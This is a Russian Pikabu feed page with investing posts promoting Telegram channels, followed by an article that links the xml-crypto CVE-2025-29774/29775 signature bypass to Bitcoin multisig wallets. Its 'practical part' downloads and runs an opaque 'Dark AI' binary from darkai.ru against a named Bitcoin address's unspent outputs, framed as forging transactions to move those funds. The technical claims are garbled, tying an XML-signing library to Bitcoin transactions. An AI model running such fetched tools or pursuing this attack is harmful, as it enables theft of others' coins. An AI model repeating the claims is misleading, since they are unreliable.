Горячее
Лучшее
Свежее
Подписки
Сообщества
Блоги
Эксперты
#Круги добра
Войти
Забыли пароль?
или продолжите с
Создать аккаунт
Я хочу получать рассылки с лучшими постами за неделю
или
Восстановление пароля
Восстановление пароля
Получить код в Telegram
Войти с Яндекс ID Войти через VK ID
Создавая аккаунт, я соглашаюсь с правилами Пикабу и даю согласие на обработку персональных данных.
ПромокодыРаботаКурсыРекламаИгрыПополнение Steam
Пикабу Игры +1000 бесплатных онлайн игр Перетаскивайте деревянные блоки и убирайте их в ворота того же цвета! Успокаивающая логическая игра без времени и ограничений.

Wood Blocks Jam

Головоломки, Казуальные, Логическая

Играть

Топ прошлой недели

  • AlexKud AlexKud 38 постов
  • Animalrescueed Animalrescueed 36 постов
  • Oskanov Oskanov 7 постов
Посмотреть весь топ

Лучшие посты недели

Рассылка Пикабу: отправляем самые рейтинговые материалы за 7 дней 🔥

Нажимая кнопку «Подписаться на рассылку», я соглашаюсь с Правилами Пикабу и даю согласие на обработку персональных данных.

Спасибо, что подписались!
Пожалуйста, проверьте почту 😊

Помощь Кодекс Пикабу Команда Пикабу Моб. приложение
Правила соцсети О рекомендациях О компании
Промокоды Биг Гик Промокоды Lamoda Промокоды МВидео Промокоды Яндекс Директ Промокоды Отелло Промокоды Aroma Butik Промокоды Яндекс Путешествия Постила Футбол сегодня
0 просмотренных постов скрыто
krasikov944krasi
krasikov944krasi
1 месяц назад
Лига Инвесторов

Скоро ли золото будет обмениваться на госдолг?⁠⁠

Скоро ли золото будет обмениваться на госдолг? Инфляция, Дивиденды, Доллары, Валюта, Кризис, Золото, Госдолг, США, Telegram (ссылка)

При текущей цене $3400 за унцию, капитализация всего золота в мире (около 6,94 млрд унций) составляет $23,6 трлн — уже 65% от размера федерального долга США ($36 трлн).

В мае 2024 Майкл Хартнетт (BofA) отмечал: «T-Bonds больше не считаются безрисковыми. Фикция надёжности заканчивается».

При цене золота в $5000/oz, мы выходим на паритет с госдолгом США. Такой сценарий — не фантастика, а результат бегства капитала из обесценивающихся бумаг.

Вопрос уже не в том, будет ли золото "обмениваться" на долг, а в том, захотят ли инвесторы держать долг, не обеспеченный ничем, кроме обещания.

Вывод: золото стремительно становится новой единицей доверия — и может вытеснить фиат даже на уровне госдолга.

НАШ ТГ КАНАЛ: https://t.me/+KvGj2ztTTNMxNTMy

Показать полностью 1
Инфляция Дивиденды Доллары Валюта Кризис Золото Госдолг США Telegram (ссылка)
4
2
chastnyjinvestor
chastnyjinvestor
1 месяц назад
Лига Инвесторов

Заседание ЦБ по ставке уже завтра! Обвалится ли рынок акций?⁠⁠

Уже завтра состоится заседание ЦБ по ключевой ставке, которое весьма вероятно окажет заметное влияние на рынок акций. И вспоминая, какое влияние оказало предыдущее решение ЦБ в июне на рынок, теперь напрашивается вопрос: а не повторится ли тот же сценарий и на завтрашнем заседании? Давайте посмотрим, насколько сильно ЦБ может снизить ставку в этот раз, и как это может повлиять на рынок акций.

Заседание ЦБ по ставке уже завтра! Обвалится ли рынок акций? Биржа, Фондовый рынок, Инвестиции в акции, Финансы, Трейдинг, Облигации, Дивиденды, Валюта, Акции, Инвестиции, Доллары, Рубль, Ключевая ставка, Инфляция, Россия, Центральный банк РФ, Кризис, Длиннопост

График (H1) индекса ММВБ

В целом, большинство аналитиков ожидают снижение ставки ЦБ до 18%, некоторые полагают, что банк может снизить ставку и до 17%, и практически никто не ждет сохранения ставки на уровне 20%, что при текущих макроэкономических данных все же уместно. Ведь с прошлого заседания какого-то серьезного прогресса в торможении инфляции мы не увидели, разве что на днях была зафиксирована недельная дефляция в 0,05% за период с 15 по 21 июля впервые с начала сентября 2024 года, в результате чего годовое значение на 21 июля замедлилось до 9,17% с 9,34%.

Однако это просто сезонный фактор, вызванный значительным снижением цен на овощи. Цены же на услуги продолжают немного расти, как и на технику. Вдобавок инфляционные ожидания за последний месяц не изменились и остались на уровне 13%, что довольно много. Такая картина не способствует сильному снижению ставки, разве что на 1 п.п., но все дело в том, что на регулятор давят другие ведомства, поэтому нельзя исключать, что ЦБ может и сильнее снизить ставку, хоть это и не выглядит логичным на фоне таких данных.

Поэтому считаю, что завтра ЦБ может снизить ставку с 20% до 18-19%. И если снижение будет до 18% и тем более ниже, то, вероятно, в сентябре снижение мы уже не увидим. В обзоре в июне писал, что было бы логичнее начать цикл снижения в июле, а в июне сохранить ставку, так как еще не было учтено влияние индексации тарифов, а июльское заседание опорное, и было правильнее сначала обновить прогнозы регулятора. Но раз первое снижение произошло в июне, то, возможно, на июльском заседании будет взята пауза в снижении, поэтому нельзя исключать, что регулятор может и сохранить завтра ставку на уровне 20%. С учетом внешнего давления на ЦБ это кажется маловероятным.

А так как рынок акций ожидает снижение ставки до 18%, сохранение ставки будет воспринято сильно негативно. Напомню, что в прошлый раз даже снижение ставки было воспринято негативно, и индекс ММВБ весьма точно тогда отработал мой прогноз, который публиковал в телеграм-канале за день до заседания, на рост к 2900 и последующее падение к 2765 на фоне решения ЦБ и его риторики.

Кстати, ранее в телеграм-канале публиковал пост с результатами своих прогнозов по нескольким популярным акциям. Результаты отличные, все прогнозы исполнились!

Если же в этот раз ЦБ снизит ставку меньше чем на 2 п.п., то, полагаю, ситуация может повториться, и технически это возможно, хоть индексу и удалось в начале этой недели пробить нисходящий тренд и ускорить рост. Поэтому и предполагаю, что ЦБ снизит ставку до 18-19%, на чем рынок акций может снова развернуться вниз. Причем не обязательно сразу, возможно, индекс сначала подскочит к 2880, а затем уже упадет к 2770. В общем, июньский сценарий движения рынка акций на фоне решения ЦБ может повториться. Но в этот раз огромное значение будет иметь еще и риторика ЦБ, а также его обновленный прогноз по ставке. Если мы увидим новый прогноз по более стремительному снижению ставки до конца года, чем был ранее, то даже при небольшом снижении ставки падение индекса не будет сильно ниже глобального нисходящего тренда.

Из-за того, что недавно его удалось пробить, то, как и планировал, шорт по фьючерсу на индекс, который брал от 2785 в расчете на падение к 2700, закрыл на пробое трендовой. Индекс упал до 2716, и его снова быстро откупили. После чего он пробил нисходящий тренд и закрепился выше уровня 2800, что, по идее, открывает путь наверх в сторону 3000, однако считаю, что уже весь позитив по поводу снижения ставки в рынок заложили, а ретест нисходящего тренда так и не сделали. Поэтому полагаю, что индекс может к нему вернуться, то есть куда-то ближе к 2750.

На это также намекает пробой локального аптренда, который произошел вчера днем. На этом пробое решил снова взять шорт от 2840 с коротким стопом. Но так как его теста снизу не было, нельзя исключать еще один отскок в сторону 2880. В этом случае буду пробовать перезайти выше.

Ранее же в июле мне удалось провести очень выгодную сделку, набрав шорт по фьючерсу на индекс от 2853 пунктов в расчете на падение к уровню 2600, вблизи которого в итоге и зафиксировал прибыль по позиции, после чего произошел резкий отскок рынка и пробой нисходящего тренда. Этот пробой уменьшает вероятность продолжения коррекции акций, однако прошел рынок вверх без приличного отката слишком много, почти 250 пунктов, поэтому пока рассчитываю хотя бы на тест глобального нисходящего тренда сверху. И если он окажется успешным (то есть индекс не сможет снова закрепиться под ним), то можно будет снова перейти к длинным позициям, хотя и обязательно со стопом.

Похоже, что именно заседание ЦБ и сыграет ключевую роль в этом вопросе в ближайшие дни. И если ожидания рынка по снижению ставки снова окажутся сильно завышенными, то мы можем увидеть возвращение индекса в рамки нисходящего тренда и продолжение падения уже ниже 2600, возможность чего мы обязательно обсудим по итогам заседания на моем канале.

Кстати, для тех, кто хочет всегда быть в курсе ключевых рыночных трендов, у меня есть телеграм-канал, где я оперативно делюсь самыми важными прогнозами и новостями. Присоединяйтесь сейчас, чтобы не упустить ключевые финансовые возможности уже в ближайшем будущем!

В общем, пока рынок продолжил рост. Приличный откат после взлета к глобальному нисходящему так и не был сделан, особенно по фьючерсу, что порождает сомнения в истинности глобального разворота рынка вверх. И все же у лонгистов теперь технического преимущества больше, чем у шортистов, если, конечно, индекс не вернется снова в рамки глобального нисходящего тренда.

Спасибо, что дочитали. Всем удачи и профита!

Показать полностью 1
[моё] Биржа Фондовый рынок Инвестиции в акции Финансы Трейдинг Облигации Дивиденды Валюта Акции Инвестиции Доллары Рубль Ключевая ставка Инфляция Россия Центральный банк РФ Кризис Длиннопост
1
3
krasikov944krasi
krasikov944krasi
1 месяц назад
Лига биржевой торговли

ФосАгро: ставка на рост в условиях разрыва глобальных цепочек⁠⁠

ФосАгро: ставка на рост в условиях разрыва глобальных цепочек Политика, Дивиденды, Инфляция, Валюта, Рубль, Владимир Путин, Фосагро, Доллары, Кризис, Облигации, Центральный банк РФ

Встреча с президентом Российской ассоциации производителей удобрений Андреем Гурьевым

«ФосАгро» — не просто лидер отрасли, а символ стратегической трансформации. Компания инвестирует в расширение мощностей на фоне глобальной ребалансировки поставок. Только в 2023–2025 гг. запускаются новые линии по выпуску карбамида, селитры, фосфатов — на фоне ухода с рынка конкурентов из Европы.

Как отметил президент Ассоциации производителей удобрений Андрей Гурьев:

«Мы — крупнейший экспортер в мире, и сегодня переориентируемся на страны БРИКС, которые дают до 50% мирового спроса» (июль 2025).



Индия увеличила импорт российских удобрений в 4 раза. «ФосАгро» за год поставила туда более 1,2 млн тонн. Компания чётко встроена в государственную экспортную стратегию.

На фоне разрыва цепочек поставок и роста цен в ЕС, экологичные удобрения российского производства становятся особенно востребованными.

Вывод: «ФосАгро» — выгодный бенефициар геоэкономического сдвига. При сохранении экспортной динамики и господдержки, потенциал роста капитализации остаётся значительным.

НАШ ТГ КАНАЛ: https://t.me/+KvGj2ztTTNMxNTMy

Показать полностью 1
[моё] Политика Дивиденды Инфляция Валюта Рубль Владимир Путин Фосагро Доллары Кризис Облигации Центральный банк РФ
0
2
CryptoDeepTech
CryptoDeepTech
1 месяц назад

Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1]⁠⁠

Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост

В этой статье мы рассмотрим криптографическую атаку подделки цифровой подписи (Digital Signature Forgery Attack), её последствия представляет собой угрозу для безопасности транзакций в сети Биткоин, поскольку цифровые подписи подтверждают право собственности и авторизацию переводов криптовалюты. Рассмотрим на примерах влияние таких атак на Биткоин на основе современных исследований и выявленных уязвимостей.

Криптографическая атака подделки подписи (Digital Signature Forgery Attack) заключается в попытке злоумышленника создать фальшивую цифровую подпись ECDSA, которая будет признана сетью Биткоин действительной. Такая атака позволяет авторизовать транзакции без знания приватного ключа владельца, что ставит под угрозу безопасность денежных средств в криптокошельке держателя монет BTC.

В криптографии цифровая подпись обеспечивает подтверждение подлинности сообщения или транзакции. Подделка подписи означает возможность создания пары «RawTX», которая будет принята системой как валидная, хотя на самом деле она не была создана владельцем приватного ключа. Это открывает путь для мошенничества, кражи средств и нарушения целостности блокчейна. Криптографическая атака подделки цифровой подписи (Digital Signature Forgery Attack) как уязвимости реализованы в программных компонентах, использующих библиотеку xml-crypto для проверки подписей XML-документов на платформе Node.js.

В первую очередь это касается корпоративных интеграционных решений, облачных сервисов и систем единого входа, таких как IBM App Connect Enterprise Certified Container и другие приложения, зависящие от xml-crypto для SAML-аутентификации и авторизации. Аппаратно уязвимости не связаны с конкретными физическими устройствами, а реализуются в программных продуктах, использующих уязвимую библиотеку.

Уязвимости CVE-2025-29774 и CVE-2025-29775, известные как криптографическая атака Digital Signature Forgery Attack, реализованы в программной библиотеке xml-crypto — это библиотека для цифровой подписи и шифрования XML-документов на платформе Node.js


Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост

Security Bulletin: IBM App Connect Enterprise Certified Container operands are vulnerable to bypass signature validation in XML data [CVE-2025-29774] [CVE-2025-29775]


  • IBM App Connect Enterprise Certified Container — программное обеспечение для интеграции и обработки данных, использующее xml-crypto для проверки подписей XML-документов. Уязвимости позволяют обходить проверку цифровой подписи, что приводит к возможности подделки и модификации подписанных сообщений, включая SAML-ответы для аутентификации и авторизации.

  • Системы и приложения, использующие Node.js с библиотекой xml-crypto для проверки подписанных XML-сообщений, особенно в контексте SAML-аутентификации (например, корпоративные порталы, системы единого входа, облачные сервисы). Уязвимость позволяет злоумышленнику модифицировать валидные подписанные XML-сообщения так, что они проходят проверку подписи, что ведет к обходу механизмов аутентификации и авторизации, эскалации привилегий и подделке учетных данных.


Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост

Disclosure for CVE-2025-29774 and CVE-2025-29775 (SAMLStorm).


  • Уязвимости связаны с неправильной проверкой криптографической подписи в xml-crypto, в частности с обработкой узла DigestValue, куда злоумышленник может вставлять XML-комментарии, не нарушая при этом проверку подписи.

  • Это позволяет изменять критические атрибуты идентификации и контроля доступа в подписанных XML-документах, что приводит к возможности обхода безопасности без необходимости иметь учетные данные или права доступа.


Таким образом, этот код реализует криптографические алгоритмы подписи и проверки подписи для различных схем (RSA с разными SHA-хешами и HMAC-SHA1), что позволяет интегрировать их в системы, требующие цифровой подписи данных.

Критическая уязвимость в коде signature-algorithms.ts

Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост

Код signature-algorithms.ts служит для безопасного создания и проверки цифровых подписей, обеспечивая аутентичность и целостность данных. ECDSA подписи обеспечивают подтверждение авторства с помощью приватного ключа, а HMAC — проверку целостности и аутентичности с использованием секретного ключа. Используемые алгоритмы соответствуют стандартам XML Digital Signature (URI алгоритмов указывают на спецификации W3C).


Таким образом, код signature-algorithms.ts реализует криптографические алгоритмы подписи и проверки подписи для различных схем (ECDSA, RSA с разными SHA-хешами и HMAC-SHA1), что позволяет интегрировать их в системы, требующие цифровой подписи данных.


Основная функциональность

  • Каждый класс реализует интерфейс SignatureAlgorithm и предоставляет методы для:

    • Создания подписи (getSignature): принимает данные для подписи и приватный ключ, возвращает цифровую подпись в формате base64.

    • Проверки подписи (verifySignature): принимает исходные данные, публичный ключ и подпись, возвращает булево значение — корректна ли подпись.

    • Получения имени алгоритма (getAlgorithmName): возвращает URI, идентифицирующий используемый алгоритм подписи.


Поддерживаемые алгоритмы

  • RsaSha1 — подпись с использованием RSA и хеш-функции SHA-1.

  • RsaSha256 — подпись с использованием RSA и SHA-256.

  • RsaSha512 — подпись с использованием RSA и SHA-512.

  • HmacSha1 — подпись с использованием HMAC на базе SHA-1.


Технические детали

  • Для RSA-подписей используется класс crypto.createSign и crypto.createVerify с соответствующими алгоритмами («RSA-SHA1», «RSA-SHA256», «RSA-SHA512»).

  • Для HMAC-подписей используется crypto.createHmac с алгоритмом «SHA1».

  • Подписи кодируются в base64 для удобства передачи и хранения.

  • Методы обернуты в функцию createOptionalCallbackFunction, что, вероятно, позволяет использовать их как с колбэками, так и с промисами (подробности не в коде).


Использование алгоритма RSA-SHA1 в криптографических подписях содержит уязвимость, связанную с коллизиями хешей SHA-1. Это позволяет злоумышленнику создавать два разных сообщения с одинаковой подписью, если он контролирует часть подписываемых данных.


Конкретно проблема находится в классе RsaSha1:

const signer = crypto.createSign("RSA-SHA1"); // Уязвимая строка


Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост

signature-algorithms.ts#L7


Также вторая уязвимость находится в классе RsaSha1:

const verifier = crypto.createVerify("RSA-SHA1"); // Уязвимая строка


Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост

signature-algorithms.ts#L17


Почему данная критическая атака на коллизии позволяют создавать разные данные с одинаковым хешем?

  1. Коллизии SHA-1: Алгоритм SHA-1 больше не считается безопасным.

  2. Контекст RSA: В сочетании с RSA это может привести к подделке подписей для непроверенных данных (например, сертификатов или документов).

  3. Рекомендации: NIST и сообщество безопасности рекомендуют использовать SHA-256/SHA-512 вместо SHA-1.


Дополнительные замечания:

  • Класс HmacSha1 (HMAC-SHA1) менее уязвим, но тоже устарел. HMAC более устойчив к коллизиям, чем «голый» SHA-1, но переход на SHA-256 предпочтителен.

  • В коде есть современные реализации (RsaSha256/RsaSha512), которые следует использовать вместо RsaSha1.


Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост

CVE-2025-29774 и CVE-2025-29775 — это критические уязвимости в библиотеке xml-crypto для Node.js, связанные с некорректной проверкой цифровых подписей в XML-документах. Обе уязвимости позволяют злоумышленнику модифицировать подписанные XML-сообщения так, чтобы изменения оставались незамеченными при проверке подписи.


Механизм Digital Signature Forgery Attack

1. Уязвимости в алгоритмах RSA-SHA1

В предоставленном коде классы RsaSha1 используют устаревший алгоритм RSA-SHA1 для подписи и верификации:

const signer = crypto.createSign("RSA-SHA1"); // Уязвимая строка №7
const verifier = crypto.createVerify("RSA-SHA1"); // Уязвимая строка №17

SHA1 считается криптографически ненадежным, основная проблема заключается в логике обработки XML-структур библиотекой:

  • При создании подписи XML-документ проходит этап каноникализации (приведение к стандартной форме, например, удаление пробелов и комментариев).

  • При верификации подписи библиотека не учитывает различия между каноникализованными и неканоникализованными версиями документа . Это позволяет злоумышленнику модифицировать документ (например, добавить комментарии или изменить структуру), не нарушая подпись.


2. Пример эксплуатации

  1. Модификация SignedInfo:

    • Атакующий добавляет в XML-документ дополнительные узлы <SignedInfo>, что приводит к неверному вычислению хеша при верификации.

    xml<Signature> <SignedInfo>...</SignedInfo> <!-- Оригинальный узел --> <SignedInfo>...</SignedInfo> <!-- Добавленный злоумышленником --> </Signature>

  2. Использование слабого алгоритма:

    • Алгоритм SHA1 уязвим к коллизиям, что упрощает создание поддельных подписей для модифицированных документов .


3. Последствия

  • Обход аутентификации: Изменение атрибутов в SAML-токенах или других XML-документах, связанных с доступом .

  • Эскалация привилегий: Подмена идентификатора пользователя на администратора в системе авторизации .

  • Массовые атаки: Уязвимость может эксплуатироваться удаленно без взаимодействия с пользователем (CVSS 9.3).


Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост

Технические детали уязвимостей:

CVE-2025-29774

  • Проблема: Недостаточная проверка структуры XML-документа при верификации подписи.

  • Эксплуатация: Добавление лишних узлов или атрибутов в подписанную часть документа.


CVE-2025-29775

  • Проблема: Некорректное использование контекста каноникализации при вычислении хеша.

  • Эксплуатация: Модификация документа в неканоникализованной форме после подписания.


Рекомендации по устранению

  1. Обновление библиотеки:

    • Для версий 2.x → 2.1.6, 3.x → 3.2.1, 6.x → 6.0.1.

  2. Замена алгоритмов: typescript// Использование SHA-256 вместо SHA-1 const signer = crypto.createSign("RSA-SHA256");

  3. Валидация структуры XML:

    • Проверка наличия ровно одного узла <SignedInfo> в подписи.

Устранение этих уязвимостей критически важно для систем, использующих XML-подписи в аутентификации (например, SAML, SOAP).


Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост

Библиотека xml-crypto, широко используется для проверки цифровых подписей в XML-сообщениях, включая такие протоколы как SAML, SOAP и другие. Из этого следует, что уязвимость потенциально затрагивает:

  • Программное обеспечение и сервисы, использующие xml-crypto для XML-подписей, в том числе корпоративные интеграционные платформы и middleware (например, IBM App Connect Enterprise, где зафиксированы эти уязвимости).

  • Устройства и системы, которые применяют XML-подписи для аутентификации и авторизации, включая серверы и шлюзы, поддерживающие SAML.


  • Уязвимости CVE-2025-29774 и CVE-2025-29775 в первую очередь касаются программных компонентов и платформ, использующих библиотеку xml-crypto для обработки XML-подписей.

  • Среди известных пострадавших — IBM App Connect Enterprise и, вероятно, другие корпоративные решения на базе Node.js с использованием xml-crypto.

  • На данный момент нет публичных данных о конкретных брендах аппаратных устройств, подверженных этим атакам.


Для оценки риска на конкретных устройствах рекомендуется проверить, используют ли они уязвимые версии xml-crypto или зависят от аналогичных механизмов XML-подписей. Для работы с криптовалютными кошельками на базе Node.js IBM предлагает отдельные решения, например, IBM Secure Bitcoin Wallet — приложение, основанное на Electrum Bitcoin Client, которое использует Node.js для взаимодействия с сетью Биткоина и управления кошельком.

В этом решении приватные ключи и кошелек могут храниться и шифроваться с помощью IBM Cloud Hyper Protect Crypto Services (zHSM), обеспечивающего аппаратное безопасное хранение ключей. Генерация приватных ключей для Bitcoin-кошельков обычно реализуется в специализированных криптографических библиотеках, таких как Electrum, bitcoinjs-lib и т.п., которые могут быть интегрированы в Node.js-приложения. IBM Secure Bitcoin Wallet использует модифицированный Electrum backend на Node.js для управления ключами и транзакциями, за счет интеграции с IBM Cloud Hyper Protect Crypto Services, предоставляющим аппаратное шифрование и безопасное хранение приватных ключей.

Практическая часть

Из теории уязвимость CVE-2025-29775 известно, что злоумышленник может обработать не обновленую библиотеку xml-crypto для некорректных значении транзакции. Перейдем к практической части статьи и рассмотрим пример с использованием Биткоин кошелька: 32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe , где были потерянный монеты на сумму: 0.059672 BTC на июль 2025 года эта сумма составляет: 7,052 USD


Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост

791fe035d312dcf9196b48649a5c9a027198f623c0a5f5bd4cc311b8864dd0cf


Рассмотрим формат: Raw transaction бинарные и hex-данные, которые содержат всю информацию о транзакции. Она нужна для передачи, проверки или создания операций на низком уровне и представляет собой основу работы всей Биткоин-сети. Обычные пользователи редко сталкиваются с Raw transaction напрямую, но для разработчиков и крипто-энтузиастов это главный инструмент для полного контроля над всеми транзакциями Биткоин-сети.


Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост

Raw Transaction


Для полного возвращение объектов UTXO в сети Биткоин воспользуемся инструментом Dark AI. UTXO является основной частью структуры данных в цепочке блокчейна и отражает количество монет BTC криптовалюты, которое может быть потрачено держателем приватного ключа (контролирующим данный Биткоин адрес). Каждый UTXO — это выход конкретной прошлой транзакции, который еще ни разу не был использован в качестве входа в последующих транзакциях.

Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост


Google Colab

Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост

https://colab.research.google.com/drive/1TKrJ0bKsNgc72H9UvzpCnh2YPmRsyPdW


1. Загрузка и установка инструмента Dark AI

Подробное описание всех команд и действий терминала

Команды:

!wget https://darkai.ru/repositories/neuralnet_tools.zip

  • wget — утилита командной строки для загрузки файлов из сети по протоколам HTTP, HTTPS и FTP.

  • Загружаем neuralnet_tools.zip архив с указаннием URL.

  • unzip — команда для извлечения ZIP-архивов в текущем каталоге.

Эта команда извлекает все файлы из neuralnet_tools.zip

!unzip neuralnet_tools.zip


Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост

Запустим команду ls для быстрого и удобного просмотра

ls


Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост

2. Запуск инструмента Dark AI

!./darkai

Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост

Выполним команду, чтобы получить информацию о так называемых непотраченных выходах транзакций (UTXO, расшифровка: Unspent Transaction Output) для указанного биткоин-адреса. Эта информация важна для оценки баланса адреса и возможности проведения новых транзакций.

!./darkai -bitcoinaddress 32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe


В результате были возвращены два объекта UTXO:

[
{'output': '8602122a7044b8795b5829b6b48fb1960a124f42ab1c003e769bbaad31cb2afd:0', 'value': 677200},
{'output': 'bd992789fd8cff1a2e515ce2c3473f510df933e1f44b3da6a8737630b82d0786:0', 'value': 5000000}
]

Каждый UTXO содержит:

  • output — идентификатор выхода. Формат: <txid>:<n>, где <txid> — уникальный хэш транзакции, а <n> — номер выхода в списке выходов данной транзакции.

  • value — сумма в сатоши (1 биткоин = 100 000 000 сатоши).


Расшифровка данных:

  1. Первый UTXO

    • Выход: 8602122a7044b8795b5829b6b48fb1960a124f42ab1c003e769bbaad31cb2afd:0

    • Сумма: 677 200 сатоши

  2. Второй UTXO

    • Выход: bd992789fd8cff1a2e515ce2c3473f510df933e1f44b3da6a8737630b82d0786:0

    • Сумма: 5 000 000 сатоши


Общий баланс

Суммарный доступный баланс адреса равен сумме всех найденных UTXO:

  • 677 200 + 5 000 000 = 5 677 200 сатоши

  • В пересчёте на биткоины: 5 677 200/100 000 000 = 0.05677200 BTC

Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост

Техническая интерпретация с помощью Dark AI

Воспользуемся процессом интерпретации, чтобы обработать не обновленую библиотеку xml-crypto для создание некорректных значении транзакции и отправим крупную сумму, алгоритм Dark AI сам выберет, какой UTXO использовать (или объединит оба).

  • Отправка средств: Все указанные UTXO могут быть использованы в качестве входов при формировании новой транзакции, что позволит потратить весь баланс или его часть.

  • Прозрачность: Такой отчёт подтверждает наличие реальных биткоин-средств на адресе и может быть использован для проверки подлинности и платежеспособности.

На биткоин-адресе 32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe имеется два активных UTXO на общую сумму 0.05677200 BTC. Эти средства можно использовать для совершения новых транзакций; оба выхода считаются подтверждёнными и не потраченными.


Как уязвимости CVE-2025-29774 и баг SIGHASH_SINGLE угрожают мультиподписным кошелькам сети Биткоин с поддельными RawTX: [Часть №1] Финансовая грамотность, Криптовалюта, Трейдинг, Арбитраж криптовалюты, Биткоины, Облигации, Заработок в интернете, Валюта, Дивиденды, Видео, YouTube, Длиннопост

Десериализация Биткоин транзакции

Чтобы получить фрагменты информации о выходе (output) Биткоин транзакции применим следующие команды, где первый выход (outs) из транзакции с уникальным идентификатором 8602122a7044b8795b5829b6b48fb1960a124f42ab1c003e769bbaad31cb2afd


!./darkai -deserialize 8602122a7044b8795b5829b6b48fb1960a124f42ab1c003e769bbaad31cb2afd


Получаем структуру ответа результата десериализации:

{'value': 677200, 'script': 'a91406612b7cb2027e80ec340f9e02ffe4a9a59ba76287'}

  • value: 677200 — сумма данного выхода выражена в сатоши (1 BTC = 100 000 000 сатоши).

  • script: a91406612b7cb2027e80ec340f9e02ffe4a9a59ba76287 — скрипт, определяющий условия траты данного выхода.


Подробное объяснение элементов: Поле value

  • Значение: 677 200 сатоши.

  • Данную сумму можно будет потратить при создании соответствующей транзакции, если будут выполнены условия скрипта.

